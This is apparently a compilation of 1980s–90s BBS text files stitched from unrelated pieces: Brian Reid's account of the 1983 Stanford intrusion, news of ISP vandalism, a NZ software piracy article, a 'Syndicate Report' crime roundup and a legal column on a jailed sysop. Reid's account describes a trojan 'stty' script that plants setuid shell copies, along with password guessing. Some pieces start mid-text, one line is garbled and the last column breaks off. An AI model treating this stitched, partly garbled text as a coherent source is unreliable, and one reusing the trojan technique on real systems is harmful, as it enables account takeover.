    The Secret Service said it reviews computer crimes much the same way it
  does other crimes: by proceeding through the proper authorization channels.
  "First, some probable cause must be proved before we can get a federal search
  warrant and then a wire tap," Devany said.
    But the Service had to adjust its methods to match the high-tech nature of
  the crimes. "The primary difference is we had to develop resource to assist
  in the collection and review of computer evidence," Simpson said. An effort
  to cultivate such resources has been made by the Computer Diagnostics Center,
  which is staffed by special agents and computer professionals who review
  evidence submitted by informants or victims of computer crime.
    Investigators at the center use "a variety of computers to review software
  seized in cases." Devany said. "Say we have a criminal investigation of
  trafficing credit card numbers. We get a federal search warrant and seize
  software and hardware that we find in a person's house". Agents at the center
  then manually review the disks and "download resonant evidence in the
  hardware and software, looking for evidence of criminality," he said.

Painfully typed at a late hour. As for the comment on the availability of smut
and bomb recipes, I only post the best smut I can find, and I never could bake
a proper bomb from those recipes. I must have needed to use the high altitide
instructions. I typed this entire article because I saw a message posted on
Fidonet where a sysop was worried about the activities of the CIA, NSA and FBI.
He was worried about the wrong people. If the CIA or NSA were caught monitoring
you, somebody could be prosecuted for illegally monitoring you (they are
restricted to foreign collection). Is seems the ones to worry about are the
Secret Service and the FBI. I also worry about the Bureau of Alcohol, Tobacco
and Firearms, as they want my Second Amendment rights too ("...the right to
keep and bare arms shall not be infringed.")

                                 <JOKER>
|----------------------------------------------------------------------------|
|        This phile was typed by DreadWolf... And like doesn't take no       |
| responsibity, for shit... So like give the Coven a kall...                 |
| The Coven                                                                  |
| 360-297-4049                                                               |
|----------------------------------------------------------------------------| 

******************************************************************************
                     HACKERS SUSPECTED IN ONLINE VANDALISM
                              By Ken Alltucker
******************************************************************************

        Two local Internet providers have been vandalized recently and they
 suspect it might be the work of computer hackers.
        Linknet, the online service provided by Kitsap Regional Library,
 has been shut down twice this week because of an online vandal.
        "We have been down two nights because of problems," said Michael
 Schuyler, director of Linknet. "We think we have it squared away at this
 point."
        Another Internet provider, Telebyte Northwest, was targeted by a
 vandal. It had soda sprayed across the windows in its office in Silverdale,
 said employee Al Wallace.
        A few months back, Telebyte's phone lines were severed, shutting
 down the system its operation for one day.
        Many area businesses depend on Telebyte for online communication,
 Wallace said.
        Linknet service stopped after someone sent a program that ate away
 the computer's memory.
        Schuyler said he has made changes in the system and doesn't expect
 problems to continue.
        The two linknet attacks halted the system for 12 hours Monday and
 Tuesday night.
        Telebyte has also had some online troubles, Wallace said. A "modem
 bomb" was recently sent to computer users, causeing several computers to
 freeze.
        Wallace said it only affected computer users who were online when it
 was sent. The bomb causes no permanent damage to computer; rather, users
 just have to restart the computers, Wallace said.
        Telebyte was the first Kitsap County commercial Internet provider
 when it started last October.
        Linknet is a service provided at no charge through Kitsap Regional
 Library. It allows users to send and receive electronic mail and access
 parts of the Internet.
        The demand for Linknet accounts has mushroomed since in(it) started
 last January, Schuyley said.
        It received a Library Services and Construction Grant two months ago
 allowing it to double its call-in lines.
        Schuyler said the new lines should be available this summer.


==)--- P TO PAUSE S TO STOP ---(==

Super Hacker-WAS HE BUSTED OR DID HE SLIP OFF INTO THE NIGHT-You decide what happened in this true story.



From: David Rogers <DRogers@SUMEX-AIM.ARPA>
Subject: "19 year old UCLA hacker"

    Well, that 19 year old hacker was here at Stanford, and here is a 
system programmers account of what it was like. After reading this message, 
I took the problem of hackers much less casually.

    (By the way, "call-back" systems are good, but if the computer is on a 
network, it's virtually impossible to keep the hackers out. Read on.)

 9-Nov-83 16:47:37-PST,8835;000000000000
Return-Path: <@SU-SCORE.ARPA:mail-daemon@Glacier>
Date: Wednesday, 9 November 1983 16:44:19-PST
To: su-bboards@Score
Subject: the breakin: short summary of a media event
From: Brian Reid <reid@Glacier>

Enough people have asked me "what really happened" that I thought it was 
worth posting a medium-sized note to bboard explaining what this computer 
intruder stuff is all about. I will also tell the tale of how it came to be 
a full-fledged media phenomenon.

Early morning on September 17 I had logged on to Shasta and noticed an 
unseemly slowness to the logon process. I was the only user on the system, 
which made it even more curious. I was too sleepy to care, but filed it 
away for future puzzleement. A few hours later Jeff Mogul telephoned me 
with the truth, which he had discovered and explained. The Shasta directory 
/usr/local/bin contained a file named "stty", whose contents was actually a 
shell script that copied /bin/csh into ~somewhere/.$USER, then chmod u+s 
$USER .$USER, then an exec of the real stty. Translating into English from 
Unix-ese, this means that when some innocent victim ran this false "stty" 
program, it would store in the perpetrator's directory a copy of the shell 
(a shell is like the Tops-20 EXEC) set up in such a way that when the 
perpetrator later executed that shell, he would acquire all of the 
permissions and access rights of the victim. The unseemly delay that I had 
noticed at 5:30 a.m. was caused by the length of time that it took to copy 
the 64KB shell file into the intruder's directory.

The "stty" program on Unix is used by virtually all users to set up their 
terminal characteristics when logging on, and most Shasta users have their 
search lists set up to look in /usr/local/bin before /usr/bin. This means 
that after the passage of a few hours, the perpetrator's directory 
contained many files with names like ".reid" or ".mogul" or ".hennessey", 
each rigged so that if he executed it he could read or write any files to 
which reid or mogul or hennessey had access.

The account used by the perpetrator belonged to Jim Miller, who had visited 
HPP last year, and who had left quite some time ago. Tom Rindfleisch 
assured me that Miller was an honest person who would not do such a thing; 
we therefore concluded that some alien was using the account. I spent a 
couple of minutes finding out some biographical data about him, and was 
easily able to guess his password. That solved the mystery of how the 
intruder was using Miller's account.

We waited for the perpetrator to log on again, and when he did so, he was 
coming in through the Internet from Purdue. I traced the net connections 
back to find out that he was logged on as Mark Bronson at Purdue, and 
immediately called Walter Tichy at Purdue to ask about Bronson, and was 
told that Mark Bronson had graduated a year ago and gone to work for a 
certain company in another state, which intriguingly enough was the same 
company that Miller worked for. This "clue" turned out to be a red herring, 
but it distracted us for a day. Chris Kent of Purdue traced the network 
connections back to SU-TAC, where the perpetrator was dialed in on a 300-
baud line.

At this point I wanted to go home for dinner, so I shut down Shasta's 
internet service, which made it impossible for him to telnet in to Shasta 
from ARPA-land. I figured that he would think Shasta had just crashed. To 
my amazement, he was logged back on within 30 seconds, this time coming in 
from Navajo via PUP telnet (which I had not shut off). A quick trace of the 
net connections showed that he was logged on to Navajo as Anita Mayo. Steve 
Hartwell phoned Anita in New York to ask her if she was doing this; she 
said no, she wasn't, but her password wou| to guess. I 
tried guessing "Anita", and sure enough it worked. Wanting to go home for 
dinner, I changed Anita's Navajo password to something unrememberable and 
killed the Mayo job on Navajo, figuring that this would keep him out.

30 seconds later he was back on again, this time coming in from Diablo, 
where he was logged on as Jeff Adams. I was unsuccessful at guessing Jeff 
Adams' password, but I realized at this point that I was dealing with 
organized crime and not just with some casual password hacker: he clearly 
had access to lists of account names and passwords all over the place. I 
hotwired Shasta's "login" so that only people actually physically in ERL 
could log in, and went home a bit shaken.

At this point I called Ralph Gorin to ask for advice, and he advised me to 
call the FBI. It took 24 hours to get them to return my call, and another 
24 hours to get them to believe that a real crime was taking place. They 
came to campus and spent a day talking to me, to Len Bosack, and to Ralph. 
The following morning they obtained permission authorizing Pacific 
Telephone to put a "trap" on the SU-TAC dialin lines; simultaneously, Len 
and Benjy Levy connected a hardcopy terminal to the TAC dialin line so that 
we could get a transcript of what the intruder was doing, to use as 
evidence if necessary.

Meanwhile back at Shasta, we were walking the fine line between keeping 
this intruder out of our files and keeping him interested enough to stay on 
the line long enough for us to trace the call. We did this by leaving his 
Trojan horse in place, and periodically getting volunteers to run it, 
whereupon he would get quite excited and spend an hour or two checking to 
see if he had acquired any interesting new privileges.  Steve Przybylski, 
Glenn Trewitt, Steve Hartwell and I took turns at this babysitting task.

Pacific Telephone told us that the calls were being made from a certain 
travel agency in San Bruno. The FBI folks made a visit there, and found no 
evidence of any such thing. Pacific Telephone then suspected that the 
telephone wires in that building had been compromised, but after another 
day of fooling around, Pac Tel admitted that what was *really* going on was 
that the call was coming in through a long-distance calling service, such 
as Sprint or MCI. The long-distance calling service people refused to 
cooperate; Len and the FBI obtained the necessary search warrant (another 
delay); they cooperated and told us that the calls were coming from Los 
Angeles.

At this point I went out of town for a program committee meeting, so I am a 
little fuzzy on the exact details, but Len and the FBI together managed to 
get the necessary traps in place on the Los Angeles local telephone end. I 
returned from the trip to resume my shift at babysitting Shasta to make 
sure the intruder did not get too carried away. By this point we had a 
fairly automatic notification mechanism set up; we doctored "login" so that 
whenever the intruder logged on it would send mail notification to all of 
us who were participating in the chase.

But he never logged in again. After a few days of wondering whether he had 
detected our traps and chickened out, I got word from Ralph that Ralph had 
gotten word that the Los Angeles police had raided some teenager's 
apartment and seized a computer. The date and time of the raid mesh fairly 
well with the last recorded instance of our intruder coming in, but of 
course we have no hard evidence that it is the same person. The FBI might 
have further evidence; they aren't talking.

That was September 22. I had thought the whole issue was dead, but last 
week somebody at Purdue told a reporter for the Los Angeles Times that I 
had located this intruder and informed Purdue of his existence; the L.A. 
Times reporter called me and I told him the story pretty much as you read 
it above. It appeared in the Sunday LA Times, and went out on the LA Times 
News Service newswire.

Well, it seems that when the LA Times runs a story on something it becomes 
Big News. The following morning (Tuesday a.m.) Len and I started getting 
calls from every imaginable reporter (Only his name and mine appeared in 
the LA Times story). Before 10am, 10 radio stations, 4 TV stations, all of 
the local newspapers, even the Stanford Daily had picked up on this hot 
story of evil alien spies penetrating the Department of Defense through 
Stanford University, and all had to have the story first-hand.

It has all blown over now; today something else is Big News. Please, 
everyone, please make sure your passwords are hard to guess. Try to make 
them non-pronounceable, and long, and certainly make them unrelated to your 
life. And try to understand that not every quote you read in the papers is 
correct.

Brian
------------------------------
DOWNLOADED FROM P-80 SYSTEMS
                                


LIBRARY MENU #5


<A>Computer Survey
<B>OrwelliaSoftware Piracy - NZListener 13-8-90

Author: Chris Barton
NZ Listener, August 13 1990.

The copy command for IBM PCs and compatibles is seductively simple.
You type: copy *.* a: You say: copy space star-dot-star space ay colon.
People think the gibberish you're muttering indicates brain damage from too
much exposure to low-level radiation from your computer screen. Wrong. Your
computerspeak command to your PC simply translates to: copy a whole bunch of
files onto the magnetic disk I've just placed in the disk drive named "a".

This language is based on the principle of "your wish is my command", but get
the command right. Its minimalist approach to communication demands precision
and has no time for nuance, ambiguity or shades of meaning. Spell incorrectly
or get a colon or a space out of place and the PC will come back with a curt
error message like "Bad command or file name" and then sit steadfastly silent,
oblivious to your curses, until you try again.

The computer is also amoral. It's language has no words to warn you about the
consequences of your actions. For example, it doesn't think of telling you that
when you use the commands like copy *.* or diskcopy a: b: (diskcopy space ay
colon space bee colon) that you could be committing theft. Or that, depending on
whether they prosecute you under the Crimes Act or the Copyright Act, you could
be facing imprisonment for up to 10 years, fines or a civil action for
substantial damages. The PC is indifferent to the fact that in Australia fines
up to $250,000 have been imposed.

No one has been successfully prosecuted for illegally copying software in New
Zealand yet. But if we believe what the software vendors tell us, the country
is riddled with software thieves. They say up to 50 percent of all business
software products such as wordprocessors and spreadsheets in use in New Zealand
are illegal or "pirated" copies. And the recently formed New Zealand Business
Software Association (NZBSA) - an alliance of software vendors - claims in the
coming year "an estimated $80 million revenue will be forfeited by the New
Zealand information industry alone as a result of widespread unauthorised
copying and related illegal practices".

So, if software piracy is rampant, why hasn't anyone been prosecuted? Well, it
could be because software copyright has never been fully tested in New Zealand
courts, although a judgment by Justice Smellie in favour of IBM in a copyright
case against Computer Imports in March 1989 went some way towards setting a
precedent. The problem is the New Zealand Copyright Act came into existence in
1962 when the computer industry was still in its infancy and contains no
explicit references to computer software. This means any case will have to argue
whether or not software constitutes a "literary work" as defined in the act and
whether, in its machine-coded form, it is a "translation" or "adaptation" of
the literary work. New Zealand legal minds are no doubt itching to sort this
out.

There are also cases of copying to other magnetic media such as video or audio
cassette tape where copyright has been infringed and where prosecutions have
been successful. But perhaps the real reason for little action being taken is
that the copying of software in endemic and so easy to do.

Software is an expensive item in any computer purchase - around $1000 each for
well-known brands of database, wordprocessor or spreadsheet - and the ease with
which you can copy these on to blank disks costing around $5 is very tempting,
even if you don't get the software manual and the benefit of software upgrades.
Some argue software vendors should look to a technological solution like the
special chip included in the new digital audio tape (DAT) recorders being sold
in the US which prevent making tape copies from compact disc players.

But it's really a case of trying to shut the stable door after the horse has
bolted. Although copy protection techniques have been used in some software,
they've never been very successful and tend to cause problems in everyday use.
And the vast quantity of existing pirated software makes the task even more
difficult. Which is why the NZBSA is adopting an educate rather than prosecute
approach. The main targets are educational institutions and large businesses
where software is "shared" among the students or employees. And from time to
time these sorts of institutions undergo a major purge of pirated software as
was seen recently at Auckland Technical Institute.

The NZBSA is also about to publish its "Software Compliance Manual for Decision
Makers" which gives guidelines on the whole issue of copying software and its
prevention.

While no one expects the NZBSA to start breaking down doors and seizing personal
computers, it's clear a prosecution test case would show they mean business. In
the meantime expect to see warning notices appear around your place of work. The
NZBSA example reads:

WARNING
Making unauthorised copies of software is a criminal act and can
expose you to instant dismissal, substantial fines, claims for
civil damages and even a jail term. Don't jeopardise your career.
Use only original software.


8
  ============================================================================

                             THE SYNDICATE REPORT
                       Bell Information Transmittal No. 8


                           Released November 24, 1986
                                  Featuring:

                 Electronic Fraudulent Crackdowns (olt ccm 11\5)

                       ISDN: A Primer Part III (eet 11\11)

              PicTel's 56-kbps 'PicturePhones' / Nynex (eet 11\11)


                                 by The Sensei

  ============================================================================

ELECTRONIC FRAUDULENT CRACKDOWNS:

       In this article; brought forth will be assorted bits of electronic
computer crime crackdowns, and other misc. fraudulent proceedings.  Actual
identification of the criminal people will not be presented; initials will
instead be used.  This is for sole protection of The Syndicate Report and
the prosecuted people.  (I definitely don't need to be charged for some
newly processed law.)

  ----------------------------------------------------------------------------

    DP, 22 year old man, of Fort Lauderdale, Fla., stands accused of American
Express and MCI.  Authorities say the man is charged with theft, possession of
stolen property, avoiding payment of telephone property, "offenses against
intellectual property and offenses against computer users."  This is the
second run-in with the law for the man from Fla.  Last October he was accused
of using his home computer to break into confidential computer files of
Southern Bell Telephone Co., police said.

----------------------------------------

    RW, A Silicon Valley businessman, has been sentenced to pay a 40,000$ fine
and serve a five-year suspended prison sentence for his part in diverting a
shipment of computer equipment to the Soviet bloc in 1985.  RW, and associate
of a brokerage firm, pleaded guilty to conspiring to violate U.S. export laws
by shipping a 196,000$ Digital Equipment Corp. computer and components from
Haiti to Czechoslovakia in February 1985.

----------------------------------------

    JS, 43, of Encino, Calif., has told local polic he's received numerous
death threats from alleged extortionists visiting his computer bulliten board.
Forum administrator JS told LA authorities he received threats and demands for
money in electronic messages posted posted on his BBS throughout August and
early September.  "We can still make you life unfit for living," said one of
the messages, according to a report by United Press International.

----------------------------------------

    Police have arrested seven youths in the South Plainfield, N.J., area on
charges they used their home computer to exchange stolen credit card numbers,
swap information on how to make free long distance phone calls, and call coded
phone numbers at the Pentagon.  Middlex County Prosecutor AR also said the
seven, all under the age of 18, had codes that would cause communications
satellites to "change position," possibly interupting intercontinental
communications, An AT&T spokesmans, however disputed that claim.  The arrest
of the seven represented the seventh major presecution under a one-year-old
state computer crime law in New Jersey.

----------------------------------------

    KG, a 19-year-old New Jersey pre-law student who said he was "addicted"
to online computer games, was placed on probation and ordered to make
restitution to CompuServe after pleading guilty to stealingcredit to continue
playing.  Court officials said KG played MegaWars for free for about three
months on illegally obtained credit card account numbers.  KG got the numbers
from carbon copies of receipts he retrieved from trash bins at a local
shopping center.

----------------------------------------

    Three teen-agers have been arrested in Jacksonville, Fla., on charges they
used credit card information stolen during an invasion of a TRW Corp. system
in Cleveland.  Eighteen-year-olds AP and MS (initials) could each face up to
five years in prison and a 5,000$ fine if convicted.  They are alleged to
have used credit information stolen online from TRW to buy atleast 800$ in
computer equipment.
    Florida State Sen. Edgar Dunn, in response to the events detailed in the
previous story, has introduced a bill that would make credit card fraud via
computer in that state subject to anti-racketeering laws.  The measure would
also tighten  Florida's existing 1984 computer crime law to allow victems to
recover three times their loss from computer crime as well as punitive damages,
reports The Associated Press.

----------------------------------------

    Transcall America, an Atlanta-based discount long-distance telephone
service, has uncovered crackers who ran up at least 12,000$ in illegal calls
in five months.  According to company officials, no one has been charged, but
the FBI is investigating the case and could bring state and federal charges.
The crackers were caught when investigators allowed a stolen access code,
which was posted on a CoCoa Beach bulletin board, to remain valid.  To bogus
calls were traced to several homes in Brevard County, Fla.

----------------------------------------

    Crackers in at least three major cities have been blamed for a 60,000$
phone bill that was sent to a California man whose stolen credit card number
was apparently posted on an underground network of computer bulletin boards.
Officials with GTE-Sprint Communications Corp. told the Associated Press that
computer vandals in Atlantic, Blatimore and New York used the Sprint number of
RB of Campbell, Calif., to charge more than 250,000 minutes of calls in two
months, Sprint spokesman MF said "an investigation is under way" with law
enforcment officials in the three East Coast cities and at least seven other
cities.  RB's (owner of Sprint code) mid-July bill ran 722 pages and listed
17,311 calls.  The total for 256,697 minutes on that bill came to 55,562.27$,
non counting an 8,197$ "volume discount."

----------------------------------------

    Kaypro Inc.'s national director of sales and marketing, SE, has been
sentenced to 30 months in prison for convictions related to a drug-smuggling
conspiracy.  Previously, the 27-year-old SE had pleaded guilty to a charge of
conspiring to travel in interstate and foreign commerce in aid of racketeering
and to a count of subscribing to a false tax return.  Most of the things he
has commited were done threw his personal computer.

  ----------------------------------------------------------------------------

       To summarize these crimes, The Syndicate Report would just like to
advise computer criminals to reveiw the previous articles and make sure the
same mistakes are not made.

  ============================================================================

ISDN: A PRIMER PART III

       There has been so much  progress over the last couple of years on
developing  standards for the various interfaces, that the transition to an
all-ISDN network will take about  half the time originally predicted.
       ISDN cautioned about many questions about technology,  costs and
pricing has yet to be  resolved.  Even so, it will be the end of the century
or later  before voice, data and images can be sent at the  high speeds
standardized by the CCITT's ISDN committees.

       Krueger, co-founder of Stanford Telecommunications Corp., spoke to more
that 100  executives from Japanese electronics companies.  The impact of ISDN
will  be positive for certain products and the death  knell for others, Data--
Quest predict.  Once telecommunications lines are all digital, the now-booming
modem  market will tail off.  Statistical multiplexors may also be a thing
of the past, and data-only  BPXs probably will become extinct.  For packet
switches, central digital switches and T-1 multiplexors, the future  will
become brighter.  Terminal adapters, to transform non-ISDN telephones,
connected to Centrex systems or PBXs, will provide market opportunities, 
Krueger said.
       One product which will quickly benefit in the Group IV facsimile.  The
clarity, speed and low cost of facsimile transmissions via an all  digital
network will  be a boon to the next generation of fax machines.  G-IV fax
machines are  now readily available but sales are languishing because of low--
bandwidth phone lines  and non-digital central switches.

       About 17 percent of all phone lines are  serviced by digital  central
switches.  Because nearly all new  switches in-stalled now are  digital--simply
because that is the cheapest way to make a central switch--About half  of all
phone lines will be served by  digital switches by 1990.  By then,  offices
wired for digital transmissions will  be able to send G-IV  faxes to other
offices with  digital networks.

  ============================================================================

PICTEL'S 56-KBPS 'PICTUREPHONES' - NYNEX:

       A Massachusetts startup specializing in video-compression  technologies
has scored big with its first  release of  "picturephones," and won a  vote
of confidence from one of  the biggest network  operators, Nynex Corp.
       For PicTel Corp. (Peabody, Mass.), the recent success  is part of a
pattern that began two years  ago when two engineers developed a proprietary
codec that allowed  the construction of a  videotelephone that didn't require
the use  of extremely high transmission speeds.  For  the much antivipated
videoconferencing  business, it was  the microcomputer.

       Because of PicTel phones operate at speeds of 56 kbits per second
(instead of traditional  1.544 Mbits per second known as  T-1 speeds), the
devices can be plugged  into digital switches already installed by telephone
companies in  a growing number of offices.  That's one  reason why Nynex
Business Information Systems  is interested in the technology  and has started
to market PicTel phones to business customers.
       Since formally  releasing the system in October, PicTel  has reported
500,000$ in orders  for the first telephone system, which costs as much as
100,000$.  There's also a growing order backlog which could augur well for
future company prospects.

       With the shipment of its first products, the increasing digitalization
of the  nation's telephone offices and the  expectations of the ISDN, PicTel's
prospects should be favourable.  To date, its principal competitors, such as
General Electric Co. plc of Britian and Compression Labs Inc.  (San Jose, CA)
offer picture phones that require an expensive videoconferencing room  and T-1
lines to handle  the breakdown, transmission and  reconstruction of video
images.


  ============================================================================

     If there is any question to the information in this file, contact the
     author.  Now can be found on the Private Sector 20 Meg, 3/1200 baud
     system at (201) 366-4431 (2600 Magazine Bulliten Board).

  ============================================================================

               This concludes this transmittal No. 8 presented by:

                       The Sensei  -  The Syndicate Report

                           Released November 24, 1986

  ============================================================================

(> ==============
 LEGALLY ONLINE
 ==============

 SYSOP JAILED IN GEORGIA
 -----------------------
 by Lance Rose

Adult BBS' continue to spread across the country. Many of them openly carry
industrial-strength hardcore materials, without much apparent concern for
legal reprisals. One might wonder if the sysops of these BBS' are fools to
proceed so fearlessly, or perhaps the vanguard of a new era of online sexual
liberation. More likely, they simply assume the coast is clear. There is
virtually no hard news about adult BBS' or their operators getting into
trouble. Murky rumors abound (including some retold in this column several
months ago), but they're easy to shrug off in their vagueness.

The suspense is over. A man named Robert Houston is currently doing time in a
jail in Jackson, Georgia, based on the presence of sexually oriented
materials on the BBS he owned and operated. Ironically, he seems to be one of
the guys who took all the right precautions. In the end, his prudent measures
lost out to a repressive local cultural climate and petty personal vengeance.

For over two years, Mr. Houston's quiet incarceration did not raise even a
murmur. Then suddenly, he showed up briefly in a segment of the CNN news show
Technology Week as an example of a sysop who got popped. An interview with
Mr. Houston was hastily arranged afterward, just in time for this issue of
Boardwatch. In a collect call from the Georgia Diagnostic Center, Robert
Houston described how he went from sysop of an adult BBS to convicted felon:

Houston owned and operated a video store and repair shop in Georgia. His BBS,
a Wildcat system called the Stonewall BBS, was a hobby, and did not net him
any money. There was a sister BBS called "Stonewall West" in California, but
the two operations shared little but their names.

The Stonewall BBS contained sexually-oriented adult materials, both straight
and gay varieties. Different types of adult materials were separated from
each other by security levels defined on the BBS. The materials were
relatively mild by adult BBS standards. According to Houston, nothing on the
BBS was racier than what one might find in Hustler, a popular magazine
nationally distributed on newsstands. There were no files with extreme
material such as child pornography or bestiality. There was also a popular
chat area, which Houston describes as the BBS version of a 900 sex talk line.
using computers to converse instead of our voices.

These areas and materials were closed to casual visitors. Anyone wishing
access to the adult materials on Stonewall BBS first had to pass through
Houston's hair-raisingly exhaustive verification procedures. On the first
call to Stonewall, each caller had to fill in a standard questionnaire of
personal information - name, address, age, phone number, and so on. Upon
completion, the caller was asked if he desired access to any of the adult
areas of the BBS. If the answer was yes, the caller was asked which category
of materials interested him, and what kind of lifestyle he led. Houston says
he used this classification to try and group together people of similar
interests within the system. Houston himself was gay, and had a fair amount
of gay-oriented materials on the system.

Next, all callers, regardless of whether they filled out both questionnaires
or only the first one, were placed in the "new users romper room" area of
Stonewall. Callers still wishing to proceed with registration were then led
into an automated callback verification sequence, where the BBS software
called back the number submitted by the caller. After callback verification,
new callers were still restricted to the new users romper room. In this area,
callers could sample limited, non-adult-oriented sections of the BBS, but
could not upload or download any files.

In the evenings, Houston read through all new applications for the day. He
called back all applicants personally the next day, and verified their
applications by voice. In certain cases, such as borderline-age applicants
stating they were college students, he checked their references to make sure
they were genuine. All callers who passed this verification step then had to
send Houston photocopies of their driver's licenses, after which they were
finally given access to the adult areas. Houston's verification process was
quite an extended routine, but he says he fully verified over 600 callers
using this method.

Houston's troubles started when he fired a teenage employee of his video
store business for basic laziness. According to Houston, directly upon being
fired the ex-employee went to Sheriff Earle Lee of Douglas County, Georgia,
the county in which Stonewall BBS operated. He told Sheriff Lee that Houston
was running a nationwide network for the distribution of homosexual materials
from the Stonewall BBS. The police moved like lightning on these charges. The
employee was fired Saturday, September 8, 1990. Two days later, on Monday,
September 10, Sheriff Lee and his deputies hauled Houston off to jail and
confiscated his computer equipment.

The arrest and seizure warrant, and the indictment that followed, contained
four counts against Houston: 2 counts of distribution of obscene materials; 1
count of solicitation of sodomy; and 1 count that Houston "provided a medium
as to which sexually explicit materials containing children could be found".
The counts in the indictment were based on the testimony of two of Houston's
ex-employees: the one who started the legal process against Houston, and
another who had been fired some months earlier.

The second ex-employee, according to Houston, was a computer hacker whom
Houston had suspected of stealing some money from his business, then altering
his business computer records to cover it up. For the indictment, both
ex-employees testified that Houston had created sex videos with them (another
allegation he entirely denies), and that he had given them both access to the
adult areas of his BBS while they were his employees, even though they were
17- year-old minors. Houston thought they were 18 years old until then.
Houston entirely denies all accusations.

After sitting in jail for a couple of months, Houston went to trial and lost.
The prosecuting attorney was D.A. David McDade of Douglas County. Houston
paid his own lawyer $10,000, and had no money left to pay for an appeal after
the trial.

Houston says the trial against him was filled with misconduct. Perhaps his
most shocking charge is that the State did not use a police expert or
independent expert to evaluate the materials contained in his confiscated
BBS. Instead, they put his own ex-employee, the computer hacker who testified
against him for the indictment, in charge of investigating the computer to
conduct the State's own inspection of the evidence! This amazing approach
bore no resemblance to normal procedure, which was to send seized evidence
requiring technical examination to the Georgia Crime Lab. If Houston's charge
is true, this is fatal contamination of the evidence - placing key evidence
against the accused in the hands of a hostile and complaining witness!

Further, Houston says the hacker/ex-employee made the most of his
opportunity, tampering with the BBS computer files to create damning evidence
against Houston. Specifically, Houston says that computer files were altered
before trial to make it look like he had been using his BBS to solicit two
17-year-olds. There were indeed two 17-year-olds on Stonewall BBS, but
Houston had given them access only to a special "teen board" area he set
especially up for them. Houston believes his ex-employee, while he had
control of BBS computer, raised the 17 year olds' security level to make it
look like they had access to the adult materials, and added suggestive
messages addressed from Houston to these callers.

Houston moved for inspection of the computer prior to trial, but the judge
denied his motion. Houston also lined up 3 different computer experts to
check the BBS system for tampering using software tools for inspecting the
computer's hard disk, and to testify to the tampering at trial. For reasons
that are unclear, his lawyer refused to use the experts. Finally, Houston
wanted to show the judge at trial how his BBS worked and how he maintained
system security and age verification, but the judge would not permit the
demonstration.

In the end, Houston was convicted of a single count of sexual exploitation of
children, under Georgia Statute 16-12-100-B6. This conviction classifies him
as a craven sex offender, equivalent to a rapist. The only evidence
supporting his conviction were the computer records regarding the
17-year-olds submitted by the ex-employee hacker. As mentioned above,
Houston's lawyer failed to offer expert testimony disputing the authenticity
and accuracy of the computer records regarding the 17-year-olds' status on
the system. Houston's lawyer further failed to obtain testimony from the
17-year-olds themselves, which could have shown the computer evidence to be
false. Houston seems bewildered at the approach taken by his lawyer. The only
reasoning the lawyer seems to have given him for these seeming enormous
strategic lapses is that such attempts to discredit the state's case would
only make Houston look worse in the eyes of the judge.

Houston says there is no law against precisely what he's been imprisoned for,
and says the prosecuting D.A. said the same thing publicly after his
conviction. Despite the unanimous confusion over whether Houston is actually
guilty of any wrongdoing, he remains in jail for the time being. Houston is
due to be released in September, 1993, and says he plans to head out of
Georgia as soon as he is permitted to do so. Douglas County has not been very
kind to Robert Houston. It is hard to say exactly what role local intolerance
of his sexual preferences might have played in the insulting abridgement of
personal rights Mr. Houston has suffered through, but it would explain the
shocking manner in which his prosecution was carried out.

The story above is based solely on the interview with Mr. Houston. Clearly
there are some areas in which it would be useful to know the other side of
the story. Nonetheless, we can make some useful observations looking at
things just from his side of the cell bars.

First, here is a sysop in jail for running an adult bulletin board. For those
who refused caution up to now for lack of evidence that people are getting in
trouble: here is your evidence. Take note that Houston was not convicted of
having any obscene or child pornography materials on his BBS. Those carrying
such materials could end up in hotter water than he did if they are ever
exposed to the court process.

Second, sysops reading this may be comforting themselves that the exact
freakish course of events Houston suffered through will not likely be
repeated. However, Houston's case is also illustrative of the way things can
break down and land you in a heap of trouble. In his case, canning a lazy
employee ended up landing him in jail, convicted of being a sleazy,
child-molesting BBS sysop. Future sysop convictions, whenever and wherever
they occur, can easily follow similarly tortuous paths from precipitating
cause to miserable result. Those who think they are clever enough to stay out
of trouble while running a hardcore porn board may see their whole scheme
unravel due to one forgotten loose end.

Third, Houston's situation provides yet another example of the institutional
amnesia still inflicting far too many law enforcement authorities and agents:
they forget all about the Constitution, especially the First Amendment, when
they seize a BBS. Houston's BBS was not adjudged to have any illegal
materials falling outside the First Amendment's protection of freedom of
speech and of the press. His conviction, contrived though it may have been,
was only for certain conduct. Yet his BBS was taken down, and likely will
never be resurrected, at least in Georgia.

There is a danger of reading too much into what happened to Robert Houston
(except for sysops knowingly running hardcore porn boards, who should pay
very careful attention to his plight). His peculiar treatment at the hands of
the Douglas County legal system does not mean that all BBS' have suddenly
become unsafe. Running a BBS carries about the same risk as it always has. If
you are reasonable in how you run your BBS, and don't knowingly get involved
with anything illegal, your chances of legal trouble are next to nothing.
Think of Robert Houston as a sysop who tried very hard to be careful while
running a BBS with contents that were riskier than average, and one day got
hit by lightning.

THAT'S ENTERTAINMENT!

Just as this column was being readied for submission, WNBC's "News at Eleven"
showed the first installment of a news series to be aired all week called
"Software: Hard Porn." This astonishing piece of television journalism starts
off with a surveillance film showing two men on a couch discussing a snuff
movie they'd like to make using a little kid. The narrator's voice-over
informs us that this time, the snuff guys are talking about procuring their
dispensable prey using a computer bulletin board . . .

The segment segues into much milder territory, next featuring the talking
head of Bruce Fancher of MindVox (a NYC Unix-based BBS system and Internet
access site) discussing the easy availability of adult GIF image files on
BBS'. Several shots of files supposedly taken  from BBS' are shown, mostly
just girlie pictures almost too tame for Playboy. Surprisingly, the
voice-over informs us that such pictures are all quite legal. They are legal,
of course. The surprising part is that the TV folks got it right.

But don't relax yet. In the very next breath, we are told that the same BBS'
carrying the adult image files also play host to pedophiles, who seek out
youngsters and attempt to arrange illicit meetings for sexual purposes.
Through the magic of TV sequencing, those cute girlie shots are instantly
converted from admittedly protected free speech to cheesecake posters on the
walls of dens of sin inhabited by sleazy, lecherous old men. The dens of sin,
of course, are the BBS' in which they prowl.

So ends the first short episode of "Software: Hard Porn", with the promise of
more rating-boosting tidbits about the sleazy world of BBS' in tomorrow's
news report.

This is a good postscript to the Houston piece. It shows that not only did
someone with an adult board get nailed, but the anti-BBS porn drumbeat is
steadily swelling in the public consciousness. This is not the first news
show covering the BBS porn angle. Last year, WOR in New York ran a story with
a similar theme. But as Howard Stern likes to remind his listeners (after his
show on WOR ended), no one watches WOR, while WNBC is one of the real TV
stations in the New York market. Those who are committed to running hard core
porn BBS' should watch their backs.

[Lance Rose is an attorney practicing high-tech, computer and intellectual
property law in Montclair New Jersey, and is available on the Internet at
elrose@well.sf.ca.us and on CompuServe at 72230,2044. He works with shareware
publishers, software authors, system operators, technology buyers,
